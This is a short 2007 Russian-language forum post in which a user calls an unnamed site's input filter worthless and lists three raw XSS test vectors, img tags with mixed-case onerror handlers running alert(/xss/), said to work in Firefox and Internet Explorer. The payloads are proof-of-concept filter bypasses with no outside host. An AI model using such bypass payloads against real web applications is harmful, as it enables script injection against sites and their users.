22.09.2007, 01:34
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
Нет, товарищи, ведь это порнография!
Фильтр там всегда был никакой. Даже обычная база теста xss всегда давала результаты.
ФФ и IE
PHP код:
<img src=. /onErrOr ='alert(/xss/)'>
<img src=. /onErrOr="alert(/xss/)">
IE
PHP код:
<img src=. /onErrOr
=`alert(/xss/)`>
Это даже немодифицированное, сырое, так сказать. Без дальнейших комментариев. |
|
|